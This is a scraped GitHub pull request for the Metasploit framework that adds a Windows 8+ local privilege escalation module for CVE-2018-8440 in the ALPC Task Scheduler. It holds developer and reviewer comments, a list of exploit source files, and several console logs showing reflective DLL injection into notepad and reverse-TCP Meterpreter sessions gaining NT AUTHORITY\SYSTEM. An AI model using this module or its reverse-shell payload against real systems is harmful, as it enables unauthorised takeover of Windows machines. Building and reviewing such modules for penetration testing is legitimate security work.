Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) by bwatters-r7 · Pull Request #10643 · rapid7/metasploit-framework

bwatters-r7 · 2018-09-14T22:58:15Z

WIP Completed

Please do ~~not~~ land... this does ~~not~~ work, ~~yet~~ now

Historical

We managed to get the PoC playing nice, and I have code execution through the reflectivedll loader, but when I try and launch the function that contains the exploit, the reflective loader fails. I have no idea why right now.

You can test it and see.... I have a test function that pops a messagebox. That function is located in the same location as the exploit function. I can call the test function fine, but Reflective Loading fails when I add a call to the exploit function.

As it is currently, you can run this module:

msf5 exploit(windows/local/alpc_taskscheduler) > show options

Module options (exploit/windows/local/alpc_taskscheduler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PATH                           no        Path to write the payload (%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT     5464             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 1780 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll...
[*] payload path length = 49...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 1780...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >

On the target machine, we get the messagebox:

If I uncomment the call to the exploit function in the test function, Reflective Injection fails with this:

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 2360 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll...
[*] payload path length = 50...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 2360...
[-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >

I've been looking at it too long, so if anyone (cough @OJ @bcook @jrobles-r7 @asoto-r7) can see what I'm screwing up, please tell me.

OJ · 2018-09-14T23:33:17Z

Nice work mate. I'll have a look either tonight or tomorrow night. Got a climbing comp on this weekend ;)

…

On Sat., 15 Sep. 2018, 08:58 Brendan, ***@***.***> wrote: Please do not land... this does not work, yet We managed to get the PoC playing nice, and I have code execution through the reflectivedll loader, but when I try and launch the function that contains the exploit, the reflective loader fails. I have no idea why right now. You can test it and see.... I have a test function that pops a messagebox. That function is located in the same location as the exploit function. I can call the test function fine, but Reflective Loading fails when I add a call to the exploit function. As it is currently, you can run this module: msf5 exploit(windows/local/alpc_taskscheduler) > show options Module options (exploit/windows/local/alpc_taskscheduler): Name Current Setting Required Description ---- --------------- -------- ----------- PATH no Path to write the payload (%TEMP% by default). PAYLOAD_NAME no The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default). SESSION 1 yes The session to run this module on. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.135.111 yes The listen address (an interface may be specified) LPORT 5464 yes The listen port Exploit target: Id Name -- ---- 0 Windows x64 msf5 exploit(windows/local/alpc_taskscheduler) > run [*] Started reverse TCP handler on 192.168.135.111:5464 [*] Checking target... [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 [*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll [*] Target Looks Good... trying to start notepad [*] Launching notepad to host the exploit... [+] Process 1780 launched. [*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll... [*] payload path length = 49... [*] original path length = 84... [*] Reflectively injecting the exploit DLL into 1780... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Exploit completed, but no session was created. msf5 exploit(windows/local/alpc_taskscheduler) > On the target machine, we get the messagebox: [image: image] <https://user-images.githubusercontent.com/17987018/45578416-fe642e80-b846-11e8-978a-50bcdd19124c.png> If I uncomment the call to the exploit function in the test function, Reflective Injection fails with this: msf5 exploit(windows/local/alpc_taskscheduler) > run [*] Started reverse TCP handler on 192.168.135.111:5464 [*] Checking target... [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 [*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll [*] Target Looks Good... trying to start notepad [*] Launching notepad to host the exploit... [+] Process 2360 launched. [*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll... [*] payload path length = 50... [*] original path length = 84... [*] Reflectively injecting the exploit DLL into 2360... [-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172 [*] Exploit completed, but no session was created. msf5 exploit(windows/local/alpc_taskscheduler) > I've been looking at it too long, so if anyone (cough @OJ <https://github.com/OJ> @bcook <https://github.com/bcook> @jrobles-r7 <https://github.com/jrobles-r7> @asoto-r7 <https://github.com/asoto-r7>) can see what I'm screwing up, please tell me. ------------------------------ You can view, comment on, or merge this pull request online at: #10643 Commit Summary - WIP: Initial CVE-2018-8440 / ALPC-TaskSched-LPE - Redo dllinjection File Changes - *A* data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-0> (0) - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.exp <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-1> (0) - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.lib <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-2> (0) - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.pdb <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-3> (0) - *A* data/exploits/CVE-2018-8440/reflective_dll.x64.dll <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-4> (0) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-5> (0) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-6> (55) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-7> (178) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ClassDiagram.cd <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-8> (2) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.aps <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-9> (0) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.rc <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-10> (0) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/dllmain.cpp <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-11> (37) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/rpc.idl <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-12> (166) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/stdafx.cpp <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-13> (8) - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/~AutoRecover.ALPC-TaskSched-LPE.vcxproj <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-14> (179) - *A* external/source/exploits/CVE-2018-8440/common/ReflectiveDLLInjection.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-15> (53) - *A* external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-16> (269) - *A* external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj.filters <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-17> (53) - *A* external/source/exploits/CVE-2018-8440/dll/src/Exploit.cpp <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-18> (208) - *A* external/source/exploits/CVE-2018-8440/dll/src/Hardlink.cpp <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-19> (107) - *A* external/source/exploits/CVE-2018-8440/dll/src/ReflectiveDll.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-20> (35) - *A* external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-21> (598) - *A* external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-22> (223) - *A* external/source/exploits/CVE-2018-8440/dll/src/exploit.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-23> (7) - *A* external/source/exploits/CVE-2018-8440/dll/src/ntimports.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-24> (51) - *A* external/source/exploits/CVE-2018-8440/dll/src/resource.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-25> (16) - *A* external/source/exploits/CVE-2018-8440/dll/src/rpc_c.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-26> (2012) - *A* external/source/exploits/CVE-2018-8440/dll/src/rpc_h.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-27> (251) - *A* external/source/exploits/CVE-2018-8440/dll/src/rpc_s.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-28> (1611) - *A* external/source/exploits/CVE-2018-8440/dll/src/stdafx.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-29> (15) - *A* external/source/exploits/CVE-2018-8440/dll/src/typed_buffer.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-30> (70) - *A* external/source/exploits/CVE-2018-8440/inject/inject.vcxproj <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-31> (255) - *A* external/source/exploits/CVE-2018-8440/inject/inject.vcxproj.filters <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-32> (35) - *A* external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-33> (116) - *A* external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-34> (36) - *A* external/source/exploits/CVE-2018-8440/inject/src/Inject.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-35> (120) - *A* external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.c <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-36> (233) - *A* external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.h <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-37> (41) - *A* modules/exploits/windows/local/alpc_taskscheduler.rb <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-38> (196) Patch Links: - https://github.com/rapid7/metasploit-framework/pull/10643.patch - https://github.com/rapid7/metasploit-framework/pull/10643.diff — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#10643>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AABw4Flo6suHTKyOUxJt603B3FBOuQ5Lks5ubDSJgaJpZM4WqDqg> .

jrobles-r7 · 2018-09-17T17:07:03Z

I was able to get this working locally with Reflective DLL Injection. I have a few hardcoded paths in the module and one in the solution for testing that I need to fix, along with some other things. I'll have the changes up sometime today or tomorrow.

jrobles-r7 · 2018-09-17T22:50:43Z

msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

OJ · 2018-09-17T22:52:54Z

Looking good! Nice work folks. I'm going to give this a once-over so brace yourself for a bunch of comments that you probably already know about :)

OJ

I think this is looking good. We could probably do away with the instance-level variables in the module as well, as I've been bitten by mixin issues with variable name clashes in the past. That's just personal preference.

Thanks again for the work so far!

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp

OJ · 2018-09-17T22:58:02Z

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp

+	CloseHandle(hPayload);
+
+	//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
+	CoInitialize(nullptr);


We may need to consider the result of this call. I've had issues in the past depending on the process that we're injecting into.

modules/exploits/windows/local/alpc_taskscheduler.rb

OJ · 2018-09-17T23:05:19Z

modules/exploits/windows/local/alpc_taskscheduler.rb

+    end
+  end
+
+  def validate_target


Should this instead be the check method that makes sure the target OS/version/arch is supported?

A check method can be added.

jrobles-r7@39128df
I was going to try checking for installed hotfix ids but there are a lot and I'm not sure how to pull the info I need from meterpreter, specifically Win10 releases/version? (1607, 1703, 1709, 1803). Some of the hotfix ids also depend on Security Updates vs Monthly Rollout.
I linked to a check example for this module in my repo. Any suggestions?
@OJ @bcoles

jrobles-r7 · 2018-09-20T02:26:35Z

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.253:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 10200 launched.
[*] Writing payload dll into process 10200 memory
[*] Reflectively injecting the exploit DLL into 10200...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.253:4444 -> 172.22.222.200:50491) at 2018-09-19 21:23:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

bcoles · 2018-09-21T06:42:37Z

I couldn't help but notice this bug does not have a logo.

I suggest something alpaca themed. Perhaps with a timepiece.

I offer:

Source images stolen from:

modules/exploits/windows/local/alpc_taskscheduler.rb

Warning is after spell...

jrobles-r7 · 2018-09-21T17:44:16Z

msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >

Merge branch 'land-10643' into upstream-master

wvu · 2018-09-21T20:45:34Z

🍰

bwatters-r7 · 2018-09-21T20:54:18Z

Testing Results:

bwatters-r7 · 2018-09-21T20:55:42Z

Release Notes

This adds a local privilege escalation exploit for Windows 8 and later targeting the Windows ALPC scheduler.

Merge branch 'land-10643' into upstream-master

asoto-r7 and others added 2 commits September 13, 2018 18:00

WIP: Initial CVE-2018-8440 / ALPC-TaskSched-LPE

4cf344d

Redo dllinjection

f38e6f4

wvu added module blocked Blocked by one or more additional tasks feature labels Sep 14, 2018

Updated VS solution and module

83af598

OJ requested changes Sep 17, 2018

View reviewed changes

jrobles-r7 added 3 commits September 19, 2018 08:49

Use System Directory

dfa030c

Specific target, add process option

8a20e0e

Add documentation

05095c8

jrobles-r7 changed the title ~~WIP: CVE 2018 8440 ALPC Scheduler~~ [WIP] CVE-2018-8440 ALPC Scheduler Sep 19, 2018

jrobles-r7 added 3 commits September 19, 2018 10:22

Added description to module

42ccc37

Inject Payload to Memory First

c76f095

Remove uploading payload dll to disk

f99df75

jrobles-r7 added 2 commits September 20, 2018 07:01

Remove unused code

ee604e1

Remove additional unused code

981fb38

jrobles-r7 added 2 commits September 21, 2018 07:15

Update documentation

6db716d

Move setup info, remove accessors

8a0f5c1

bcoles reviewed Sep 21, 2018

View reviewed changes

jrobles-r7 added 2 commits September 21, 2018 10:11

Code cleanup, feedback from bcoles

c9de43c

specify meterpreter, update documentation

47bf780

Warning is after spell...

bwatters-r7 removed the blocked Blocked by one or more additional tasks label Sep 21, 2018

bwatters-r7 self-assigned this Sep 21, 2018

bwatters-r7 merged commit 47bf780 into rapid7:master Sep 21, 2018

bwatters-r7 added a commit that referenced this pull request Sep 21, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler

8495477

Merge branch 'land-10643' into upstream-master

msjenkins-r7 pushed a commit that referenced this pull request Sep 24, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler

2b194e2

Merge branch 'land-10643' into upstream-master

gdavidson-r7 added the rn-exploit label Oct 10, 2018

asoto-r7 changed the title ~~[WIP] CVE-2018-8440 ALPC Scheduler~~ Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) Dec 11, 2018

bwatters-r7 deleted the cve-2018-8440 branch January 29, 2019 19:41

Conversation

bwatters-r7 commented Sep 14, 2018 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

WIP Completed

Historical

Uh oh!

OJ commented Sep 14, 2018 via email

Uh oh!

jrobles-r7 commented Sep 17, 2018

Uh oh!

jrobles-r7 commented Sep 17, 2018

Uh oh!

OJ commented Sep 17, 2018

Uh oh!

OJ left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

OJ Sep 17, 2018

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

OJ Sep 17, 2018

Choose a reason for hiding this comment

Uh oh!

jrobles-r7 Sep 18, 2018

Choose a reason for hiding this comment

Uh oh!

jrobles-r7 Sep 21, 2018

Choose a reason for hiding this comment

Uh oh!

jrobles-r7 commented Sep 20, 2018

Uh oh!

bcoles commented Sep 21, 2018

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

jrobles-r7 commented Sep 21, 2018

Uh oh!

wvu commented Sep 21, 2018

Uh oh!

bwatters-r7 commented Sep 21, 2018

Uh oh!

bwatters-r7 commented Sep 21, 2018 • edited by jrobles-r7 Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Release Notes

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

8 participants

bwatters-r7 commented Sep 14, 2018 •

edited

Loading

bwatters-r7 commented Sep 21, 2018 •

edited by jrobles-r7

Loading